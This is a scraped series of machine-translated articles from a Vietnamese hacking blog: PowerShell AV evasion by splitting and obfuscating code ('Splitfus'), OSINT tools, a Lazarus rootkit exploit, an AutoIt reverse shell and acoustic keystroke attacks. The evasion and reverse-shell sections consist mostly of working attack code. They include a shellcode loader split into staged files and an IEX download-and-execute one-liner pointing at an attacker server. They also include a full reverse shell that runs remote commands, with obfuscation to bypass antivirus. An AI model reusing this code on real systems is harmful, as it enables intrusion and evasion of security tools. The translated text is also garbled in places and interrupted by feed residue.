Currently, defensive systems such as Antivirus (AV) and Endpoint detection & response (EDR) are increasingly strong. However, hackers are constantly creating sophisticated techniques to overcome this protective layer. One of the common techniques is Splitfus. This is the method of dividing the PowerShell code and disturbing the code (Obfuscate), then executing each part in many stages (staged deliver). So why is this technique so effective? Let’s find out with me!

Splitfus (abbreviated for Split + Obfusication) is the technique that hackers use to:

• Split (Split) Powershell malware into many paragraphs, for example: malware1.ps1, malware2.ps1, malware3.ps1, …
• Obfuscate (Obfuscate) Each code to avoid being analyzed or detected by AV’s signature
• Execution in many stages (stageding): When performing the attack, the victim will download each code from the hacker server and run directly in the memory, instead of saving the entire Payload on the disc. This is a realistic type that is commonly known as Multi-Stage Attack or Fileless malware

• Reducing the possibility of being detected by signature-based detection
• Traditional AV is based on signatures or unique designs. When the malicious code is broken down and encoded, there is no paragraph containing the entire Payload, making the detection difficult.
• Avoid scanning and sandbox
  • If the entire Payload is in a file, AV is easy to analyze before running
  • With Splitfus, the monopoly is dynamic (on-demand) from the hacker server, so the sandbox environment is difficult to recreate the entire process
• BYPASS AMSI (Antimalware Scan Interface)
• Windows Amsi is capable of scanning PowerShell content before execution. However, with Splitfus:
  • Small codes, Obfuscated and dynamic loads → difficult to be fully analyzed by Amsi
  • Many hackers also combine Amsi bypass With Splitfus to increase efficiency
• Flexible and easy to update
• Hackers can change any segment on the server without spreading the entire Payload. This makes it harder for tracing or developing AV signatures

The simple theoretical part is so short, now I will take the actual example for you to easily imagine how the technique is done

Many APT and Malware Framework attack campaigns like Cobalt Strike, PowerShell Empire, Metasploit has applied the same mechanism as Splitfus to spread Payload Staged. This is a popular trend in current fileless attacks.

Alright, now I try to run a piece of PowerShell code: Write-Host “Invoke-Mimikatz”. Oh you see, Antivirus discovered and blocked this code. This is only a piece of code printing out the string on the Terminal, why is it blocked? Because it contains a string of characters “Invoke-Mimikatz”. This is one Signature (signature) Extremely famous and typical of the attack tool Mimikatz

Thus, the AVs are configured to immediately block any code containing this dangerous signature, even at the earliest stage, to prevent all potential intentions related to Mimikatz. This is a risk prevention measure.

So we already know how to AV is configured, now try separating the “Invoke-Mimikatz” string into many different short chains.

As you can see, although separating the chain into small parts such as “Invo”, “ke”, “-mim”, “ikatz”, AV still does not detect malicious code. Later, when we resumed these strings in the process of implementing the results, “Invoke-Mimikatz” but has surpassed AV’s detection system. This is the simplest example of Splitfus

Now let’s see a more realistic exploitation example with the following PowerShell code, with the file called SC-Boriginal.ps1

[Byte[]] $shellcode = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)

function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp = $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}
$handle = $assem.GetMethod('GetModuleHandle').Invoke($null, @($moduleName));
[IntPtr] $result = 0;
try {
Write-Host "First Invoke - $moduleName $functionName";
$result = $tmp[0].Invoke($null, @($handle, $functionName));
}catch {
Write-Host "Second Invoke - $moduleName $functionName";
$handle = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $handle);
$result = $tmp[0].Invoke($null, @($handle, $functionName));
}
return $result;
}

function getDelegateType {
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void])
$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')
$type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}

$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $shellcode.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $lpMem, $shellcode.Length)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)

This is the PowerShell code to execute the Shellcode of Calc.exe on Windows, if we execute the entire code, it will be blocked by AV. And now I will apply Splitfus technique. First I will use the tool Chima To disturb this code, it becomes harder to read with the following statement

./chimera.sh -f sc-original.ps1 -l 3 -v -t -s -b -j -o sc-obf.ps1

Now, the PowerShell code was initially tangled by changing. Next, I will divide this file into smaller parts to execute in a discrete manner, making the security system unable to detect the typical signature of Shellcode

Next, I divided the SC-OBF.PS1 file into 4 separate files: SC1.PS1 (containing the shellcode storage variable), SC2.PS1 (containing the tangled LookupFunc function), SC3.PS1 (containing the tangled GetDelegatetype) and SC4.PS1 (containing the last 3 lines of code). Each part of this part is scanned individually will not cause warnings from AV. This is a disturbed and separate code of each file as I said

#sc1.ps1
[Byte[]] $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)

#sc2.ps1
function iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs {
Param ($JzGCXcYJmJdQKoCerSqNXT, $LaHgzlZeSdXkwSwksNKHLbDEymlFp)
$FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$jWwCsHjXRPShPEyyEBpzOw = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}
$aFUfleAnufbxjgylCpxMoZnlpUkts = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethod('GetModuleHandle').Invoke($null, @($JzGCXcYJmJdQKoCerSqNXT));
[IntPtr] $XHcKpPqwXEaSejzfchayBW = 0;
try {
Write-Host "First Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));
}catch {
Write-Host "Second Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";
$aFUfleAnufbxjgylCpxMoZnlpUkts = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $aFUfleAnufbxjgylCpxMoZnlpUkts);
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));
}
return $XHcKpPqwXEaSejzfchayBW;
}

#sc3.ps1
function DdKSsQGFmFfVhpHEtVzHaZFCWQGs {
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $GVUAdTXmnEpoFzPorhRfka,[Parameter(Position = 1)] [Type] $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB = [Void])
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')
return $YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.CreateType()
}

#sc4.ps1
$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll VirtualAlloc),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe, 0, $WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll CreateThread),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH,[IntPtr]::Zero,0,[IntPtr]::Zero)

The steps to perform this Splitfus technique are also very simple. First, I used the following command to initialize the Python server on port 80 with the IP address of 192.168.1.17:

python3 -m http.server 80

This server will save the Script PowerShell files that have been separated and tangled, allowing the victim’s machine to download separate parts.

Finally, I created a brief execution command to execute on the victim’s machine

1..4 | ForEach-Object { IEX (New-Object System.Net.WebClient).DownloadString("http://192.168.1.17/sc$_.ps1") }

This command will download and execute each script file from SC1.PS1 to SC4.PS1. This is an effective way to overcome malicious detection mechanisms because each individual part can look harmless. When combined, they form a complete attack that many security solutions cannot be detected

With Metasploit, creating Shellcode becomes much easier. I will use the MSFVENOM command to create a new shellcode, then replace it with SC1.PS1. This allows me to customize the attack in many different directions, from taking the victim’s computer to steal information or install Backdoor

https://stroamable.com/rwoo4k

And these are simple examples, but in fact, PowerShell malicious code is not so simple. Hackers will have to use more techniques BYPASS Amsi To increase the success rate

How to defend before Splitfus

Splitfus technique is one of the sophisticated powerhell attack methods, difficult to detect if the system is not closely monitored. In order to effectively defend before Splitfus, the network security team needs to synchronously deploy many active measures, from monitoring behavior to building an early warning system and ending training.

Strengthen PowerShell monitoring

PowerShell is a tool that is often abused in modern attacks. To monitor abnormal operations, the system needs to turn on the Script Block Logging Diary feature (using the Event ID 4104) in combination with the logging module. These settings help save the entire PowerShell command that were executed, even when the OBFUSCATE was tangled. In addition, it is advisable to activate the Constrained Language Mode to limit the use of dangerous commands in the PowerShell execution environment.

Activate and protect AMSI (Antimalware Scan Interface)

Amsi is an important defense class that helps analyze the code before being executed in PowerShell. Make sure that Amsi is always enabled and not overcome (BYPASS) is essential. When integrated with Microsoft Defender or EDR solutions that support Amsi scanning, the ability to detect malicious code will be significantly improved, helping to prevent attacks from Splitfus early.

Check the dynamic load in the system

A common feature of Splitfus is to use dangerous parameters in PowerShell such as Encodedcommand or call the IEX function to download remote code via chain such as (New-Object net.webclient) .Downloadstring. The EDR or HIDS systems need to be configured to identify these behaviors. At the same time, it is necessary to be alert when detecting the script downloaded from unnecessary domain, especially the HTTP GET requirements containing the tail files .ps1.

Strict network access control

The network access control plays an important role in preventing Splitfus from communicating with the control server (C2 Server). It is necessary to actively block outbound connections to IP addresses or suspected domain. The proxy configuration combined with TLS test (TLS Inspection) will help detect the acting behavior hidden under encrypted connections. In addition, continuous updates of attack indicators (IOC) from Threat Intelligence Feed will improve the ability to identify and respond promptly.

Finally, the human element is always the weakest link in the defense chain. Propagating and training end users to raise security awareness is mandatory. Staff should be instructed not to run script from unclear sources. At the same time, the skill of identifying the fake email (Phishing) should also be focused because this is usually the starting point of Splitfus attacks.

OSINT stands for “open source intelligence”. This concept refers to finding information that you can legally access, through legal means. OSINT is primarily performed online, but it can also be performed offline. Pentesters use OSINT to research their targets, and threat intelligence experts use OSINT to learn about cyber threats. OSINT is an important tool for both red and blue teams.

Below are some of the most popular tools for OSINT.

10 OSINT tools that hackers need to know

Shodan

Shodan is a search engine for exploitable network devices on the internet, such as servers and IoT devices. Exploitable means publicly accessible. It is possible to place a server, IoT peripheral or network device on the internet and configure it to be relatively private and difficult to fingerprint. But if a device is connected to the Internet without careful security configuration, you can find it through Shodan with the right searches.

Using Shodan without a premium account will return a very limited number of search results. A premium account is a lot more useful if the type of OSINT cyber research you do requires exploring servers, network devices, and IoT peripherals (such as cameras).

Maltego

Maltego runs as a dedicated application for Windows, Mac and Linux desktops, allowing users to access multiple data sources for OSINT, journalistic research and forensics purposes. There are over 58 data sources in Maltego as of this writing, including Google Maps geocoding, AlienVault OTX, ATII Hades Darkweb Intelligence, Blockchain.info, Crowdstrike, VirusTotal, and many others. I hope the number of data sources integrated into Maltego will increase over time.

The value that Maltego provides to researchers is not only in its vast collection of data sources but also in the way its platform can show users data patterns and trends through visual charts Highly customizable. Up to one million entities can be plotted in the chart that Maltego creates.

Of course, you can take advantage of all of Maltego's features but it's not free, although they will let you see a demo before you decide to sign up. But if you don't want to pay, the free Maltego Community Edition can still be very useful.

Google Dorks

Google Dorks is not an app. Rather, it is a technique that uses the Google search engine that everyone uses every day. Don't go looking for the official Google Dorks app, it doesn't exist. But there are developers who have developed open source software tools for Google Dorking that you can try, such as Pagodo and GoogleDorker.

A typical Google Dorking strategy starts by using simple search queries and then moves on to more complex queries. Most people just type strings of text into Google searches, such as “weather forecast” or “abc xyz”. But there are a number of search operators that can be used in Google searches to return more results than you intended. For example, you can try “site:anonyviet.com” to search specifically on your site, or use quotation marks around a search term to return only results that use the search term. look for that exact thing. Google offers a list of tips for refining your Google searches here.

A lot of websites are very poorly configured when it comes to cybersecurity. Google's web crawling bots are most effective on the web when they have access to explore. So, Google Dorking can be a technique to find data such as email addresses, login information, and bank numbers that have not been properly secured.

Recon-ng

Recon-ng is an open source web reconnaissance tool. Its power will be increased by the modules you can install to it. If you use Recon-ng effectively, you can save a lot of time in OSINT research.

Recon-ng can be run from the command line. If you want to make Recon-ng useful for your purposes, select the Marketplace option from the main menu and explore what's available. There are a huge number of modules you can try out, with more being improved and added continuously.

If you're comfortable with the command line and you want OSINT to work much more efficiently, Recon-ng may become one of your favorite tools.

Ahmia.fi

Ahmia.fi is a search engine specifically for finding sites on the Tor Network, although the search engine itself is also accessible on the “clearnet”. But you will need Tor Browser to open your Tor search results.

Many marketplaces and forums are located on the Tor Network, so making effective use of the Ahmia.fi search engine can be a great method for your OSINT forensics work.

Wayback Machine

Where are the old dead websites now? Wayback Machine is a search engine of over 632 billion websites and growing, many originating in the 1990s.

Archive.org is using the Wayback Machine to archive as much of the web as possible. You can also use their website to manually host websites that are currently online. If and when websites and web servers are deleted or taken offline, an archived copy can be found through the Wayback Machine.

I personally found websites archived from 1994 to 2021 through this tool. And what's really cool is that you can often use links in archived sites to go to the archives of those other sites.

theHarvester

theHarvester is another useful open source spy tool that you can install from GitHub. It can be used to get email addresses, servers, subdomains, employee names, and open internet ports from various public sources such as search engines, PGP key servers, and Shodan.

Once Harvester is installed, you can easily run the application from your command line. There is a particularly rich set of options for exploring data in DNS servers. DNS servers have all kinds of information that is very useful because they associate domain names with specific IP addresses.

Some of my favorite data sources you can explore with Harvester include LinkedIn, Bing, Google, and VirusTotal.

TinEye

TinEye is a powerful tool for online image research. If you have an image on your local device, you can upload it to TinEye and see if and how the image is used on other websites.

The most obvious use case is if you have a photo of someone whose identity you don't know and you want to find out who they are. But there are many other use cases, such as “where was this photo taken?” or “what app is this a screenshot of?”

Conversely, if you have the URL of the image on the web, you can conduct research that way as well.

TinEye is also useful for maintaining your privacy. For example, perhaps you should protect your child's privacy. TinEye can notify you if and when your child's photos are shared online.

OSINT Framework

The OSINT Framework is the perfect web application if you're not sure which OSINT data source you'll need to use to find the information you want. So the OSINT Framework presents you with a giant tree of potential data sources that you can explore.

Do you want to analyze malicious files, usernames, geolocations, IP addresses, domains, IRC, Dark Web, metadata, threat intelligence, phone numbers or maybe something else? other? Keep clicking through the chart tree until you find the source you need.

The OSINT Framework can be your first step in the entire OSINT process.

The notorious hacker group Lazarus from North Korea exploited a “zero-day” security vulnerability in the Windows operating system to escalate privileges to mistakenly attack users. This is part of their attack campaign using a rootkit called FudModule.

This vulnerability, codenamed CVE-2024-21338, discovered by Avast during Lazarus attacks last year. The company created a test exploit (PoC) and submitted a report to Microsoft in August 2023.

Microsoft patched the vulnerability during its “Patch Tuesday” security update in February 2024. However, the initial announcement of CVE-2024-21338 did not mention that it had been exploited In reality. On Wednesday, the tech giant updated its notification to warn customers that the exploit was still ongoing.

Avast's blog post on Wednesday provided a detailed technical description of the vulnerability and how Lazarus exploited this CVE to distribute the rootkit. The location of the attack is located in the 'appid.sys' driver related to Microsoft's AppLocker security feature. Instead of installing malicious drivers themselves (BYOVD), Hackers will target a driver available in many systems to avoid detection.

Rootkits is a type of malware (malware. malware) is designed to hide its or other malware's existence in the computer system. Rootkits penetrate deeply into the system with high-level access (root or administrator), allowing hackers to control the entire system without being detected. Rootkits can cause many security problems, including stealing personal information, monitoring user activity, and installing additional malware. Due to their high level of concealment, rootkits are difficult to detect and remove.

Avast explains: “By exploiting such vulnerabilities, Hackers minimize saving or downloading other malicious drivers.” This helps Hackers attack the system kernel (kernel) so they can bypass most detection mechanisms and even work on systems that apply driver control.

Through CVE-2024-21338, hacker Lazarus has elevated User rights on the compromised system and created a direct read/write mechanism at the operating system kernel level. This trick allows them to directly manipulate kernel objects in the updated version of the FudModule rootkit (appearing in 2022).

The new rootkit version has improvements that increase stealth and disable security software AhnLab V3 Endpoint Security, Windows Defender, CrowdStrike Falcon and HitmanPro.

The Lazarus campaign tracked by Avast also used a remote access trojan (RAT) new, detailed information will be announced by the company later.

]]> https://en.anonyviet.com/north-korean-hackers-take-advantage-of-windows-vulnerabilities-to-attack-with-rootkits/feed/ 0 https://en.anonyviet.com/how-hackers-bypass-av-infiltrate-windows-with-autoit/ https://en.anonyviet.com/how-hackers-bypass-av-infiltrate-windows-with-autoit/#respond Tue, 09 Jan 2024 08:30:55 +0000 https://en.anonyviet.com/?p=14346

In the age of digital technology, when network security becomes increasingly important, grasping the knowledge of how to attack and defend is undeniable. The Autoit programming language is an easy to read and understand scripting language, often used to create automation scripts. However, in the hands of hackers, it can become a powerful malicious tool.

We will explore together how hackers create a Reverse Shell attack that can bypass conventional anti-virus measures and how Autoit can be exploited to accomplish this. Let's explore together!

Note: This article is for educational, research and study purposes only. Anonyviet will not take full responsibility for illegal acts!

A brief introduction to the Autoit programming language

AutoIt is a programming language for the Windows operating system, primarily used to automate tasks. With simple syntax and strong integration with Windows, the AutoIt language is a flexible tool for automated scripting, from software installation to user interface interaction. Known for its stability and high compatibility, the AutoIt programming language is a popular choice among Windows users and software developers.

How Hackers Bypass AV Infiltrate Windows with Autoit

Hackers penetrate our computers in many different ways. But in this article, I will mention the Reverse Shell technique, which is a popular technique for intrusion into network systems, places the The compromised computer creates a connection with computer target of the attacker. This allows attackers proceed remote intrusion activities, include setting malicious code, steal data, Revision system configuration etc. This technique primarily used aim exploit degree trust of the system network and create a window virtual aim perform intrusion activities.

First of all, I will create a file called ReverseShell.au3 and the code starts by declaring the necessary libraries from AutoIt

#include <AutoItConstants.au3>
#include <GUIConstantsEx.au3>
#include <MsgBoxConstants.au3>

Next, the IP address and port of the control server are set in global variables. In this case, the hacker machine is located with IP address 127.0.0.1 (localhost) and port 4444

Global $host = "127.0.0.1"
Global $port = 4444

Define a global variable to store the current path of the victim machine

Global $currentDir = @WorkingDir

In an infinite loop, this code will check if the victim's machine is accessible to the hacker's machine, using the Ping function. If the victim machine is accessible, it will try to connect to the hacker's computer via TCP protocol. If the connection is successful, the loop exits. And vice versa, if the connection fails, the code will continue to run until the connection is successful

While 1
    If Ping($host, 250) Then ; Check if the server is reachable
        TCPStartup()
        $socket = TCPConnect($host, $port)
        If $socket <> -1 Then ; Check if the connection is successful
            ExitLoop ; Exit the loop if the connection is established
        EndIf
        TCPCloseSocket($socket)
        TCPShutdown()
    EndIf
    Sleep(1000) ; Wait for 1 second before retrying
WEnd

After the victim's computer connects to the hacker's computer, the victim's computer will send the current path to the hacker's computer

TCPSend($socket, $currentDir & "> ")

Once connected, the victim's computer continues to listen to receive commands from the hacker's computer. If the received command begins with “cd”, it executes a directory change command. If not, it executes the command on the operating system and sends the results to the hacker's machine

While 1
    If @error Then ExitLoop
    $recv = TCPRecv($socket, 1024)
    If $recv <> "" Then
        If StringLeft($recv, 3) = "cd " Then ; Check if the command is a change directory command
            $dirToChange = StringTrimLeft($recv, 3)
            $dirToChange = StringStripWS($dirToChange, 3) ; Remove leading/trailing whitespaces
            If FileChangeDir($dirToChange) Then
                $currentDir = @WorkingDir
                TCPSend($socket, $currentDir & "> ")
            Else
                TCPSend($socket, "[!] Failed to change directory" & @CRLF)
                TCPSend($socket, $currentDir & "> ")
            EndIf
        Else
            $cmd = Run(@ComSpec & " /c " & $recv, "", @SW_HIDE, 2)
            $stdout = ""
            While @ComSpec & " /c " & $recv <> ""
                $line = StdoutRead($cmd)
                If @error Then ExitLoop
                $stdout &= $line
            WEnd
            $ret = TCPSend($socket, $stdout)
            TCPSend($socket, $currentDir & "> ")
            Sleep(500)
        EndIf
    EndIf
WEnd

After the hacker completes his purpose, the AutoIt code will close the TCP connection and turn off the TCP library

TCPCloseSocket($socket)
TCPShutdown()

Here is the entire code:

#include <AutoItConstants.au3>
#include <GUIConstantsEx.au3>
#include <MsgBoxConstants.au3>

Global $host = "127.0.0.1"
Global $port = 4444

Global $currentDir = @WorkingDir

While 1
    If Ping($host, 250) Then ; Check if the server is reachable
        TCPStartup()
        $socket = TCPConnect($host, $port)
        If $socket <> -1 Then ; Check if the connection is successful
            ExitLoop ; Exit the loop if the connection is established
        EndIf
        TCPCloseSocket($socket)
        TCPShutdown()
    EndIf
    Sleep(1000) ; Wait for 1 second before retrying
WEnd

TCPSend($socket, $currentDir & "> ")
While 1
    If @error Then ExitLoop
    $recv = TCPRecv($socket, 1024)
    If $recv <> "" Then
        If StringLeft($recv, 3) = "cd " Then ; Check if the command is a change directory command
            $dirToChange = StringTrimLeft($recv, 3)
            $dirToChange = StringStripWS($dirToChange, 3) ; Remove leading/trailing whitespaces
            If FileChangeDir($dirToChange) Then
                $currentDir = @WorkingDir
                TCPSend($socket, $currentDir & "> ")
            Else
                TCPSend($socket, "[!] Failed to change directory" & @CRLF
                TCPSend($socket, $currentDir & "> ")
            EndIf
        Else
            $cmd = Run(@ComSpec & " /c " & $recv, "", @SW_HIDE, 2)
            $stdout = ""
            While @ComSpec & " /c " & $recv <> ""
                $line = StdoutRead($cmd)
                If @error Then ExitLoop
                $stdout &= $line
            WEnd
            $ret = TCPSend($socket, $stdout)
            TCPSend($socket, $currentDir & "> ")
            Sleep(500)
        EndIf
    EndIf
WEnd

TCPCloseSocket($socket)
TCPShutdown()

Next, the hacker will compile the ReverseShell.au3 script into ReverseShell.a3x

When the compilation process is completed, the hacker opens a web server to store the autoit.exe and ReverseShell.a3x files to prepare for the attack. And here I have prepared a Batch script called RS.bat with the following content:

Now I will go to the website https://www.batch-obfuscator.tk/ Encrypt this RS.bat file to bypass AntiVirus

The following are Virustotal's scan results: https://www.virustotal.com/gui/file/e18726a16d26bd432fd422a6a34636d61cfea23fde3a79639bd0cabb548fbfee?nocache=1

Demo videos:

Thus, by taking advantage of AutoIt's flexibility and customization, hackers can create malicious scripts that antivirus programs often cannot recognize. Some methods that hackers often use are constantly changing malicious code to avoid detection, using encryption techniques or changing the structure of the code to avoid recognition by security software. Along with taking advantage of system vulnerabilities and creativity in creating new intrusion techniques, hackers can create powerful intrusion tools that are difficult to detect and pose a danger to the public. systems. From there, we need to always update and improve our security knowledge to protect ourselves as well as protect the digital environment.

Read more: How do I Bypass AV into Windows 10 with Metasploit and Python?

Do you know that Keystroke sounds can reveal passwords to hackers Are not? This is a serious problem that any network user needs to pay attention to. In this article, AnonyViet will explain to you how hackers use AI to analyze the sound from the keyboard and give recommendations so you can protect your password. Let’s follow along!

Why can the sound of keystrokes reveal passwords to hackers?

You may think that your password is a safe secret that only you know. But in reality it’s not really like that. A recent study by a team of experts at Cornell University (USA) revealed an AI-controlled attack that can steal users’ passwords with up to 95% accuracy just by listening. sound from the keyboard.

So how do hackers do this? They use an AI system trained to recognize the audio characteristics of each keystroke, such as waveform, pitch, and timing. From there, they can reconstruct what is typed, including passwords.

What is worrying is that hackers can carry out this attack remotely, through applications such as Zoom or Skype, without needing direct access to the victim’s computer. The team tested it on Zoom meetings. AI will analyze the audio as they type the corresponding message that appears in the chat.

This is a quite feasible scenario, because in today’s digital age, we often use online meeting support applications to work or study. In addition, we also have the habit of typing passwords while in these meetings, to log in to other accounts or applications. This causes Keystroke sounds can reveal passwords to hackers Easily.

The researchers used computers from the company that brags the most about privacy and security: Apple. They pressed 36 individual keys on a MacBook Pro, each key a total of 25 times, then ran the recordings through software to identify small differences between each key.

It took some trial and error to reach the final result, but after testing, the researchers were able to identify keystrokes with 95% accuracy from an iPhone and 93% using Zoom

Recommendations for protecting user passwords

Passwords are one of the important factors to protect users’ personal information and accounts online. If you reveal your password hackeryou may experience serious consequences, such as:

• Unauthorized access to important accounts, such as email, banking, social networks…
• Personal information or money stolen
• Taking advantage of identity to commit illegal acts

Therefore, you need to take measures to protect your password from hacker attacks. Here are some recommendations that you can apply:

Use password management applications

You can use password management applications to create and store different, secure passwords for different accounts.

These applications will help you create random, long and complex passwords that are not easy to guess or break by hackers. You can also access your passwords conveniently and securely, just remember a single master password.

Don’t use easy-to-guess passwords

You should not use passwords that are easy to guess or related to personal information, such as name, date of birth, phone number, etc. These passwords are easy to be detected by hackers. In addition, you should also avoid using common passwords, such as 123456, password, abcdef, etc.

Enable two-factor verification (2FA)

2FA is an extra layer of protection for your password, requiring you to enter an additional verification code sent to your phone, email or app when logging into accounts. Thanks to that, even if hackers get your password, they still cannot access your account without the verification code.

Do not type your password while participating in online meetings or when strangers are around

You should wait until the meeting is over or out of earshot of the stranger before entering your password. This will help you avoid typing sounds that could reveal your password to hackers.

Turn off the microphone and do not place it near the keyboard when typing a password

You should turn off the microphone when you have nothing to say in online meetings, to minimize noise and avoid revealing the sound from the keyboard to hackers. You should also keep the microphone away from the keyboard when typing a password, to reduce the sound intensity and make it difficult for hackers to analyze.

Note

Additionally, you should also follow the usual security tips: Don’t click on strange links, don’t open emails from unknown senders, don’t download and open files that you’re not sure are safe or not, etc.

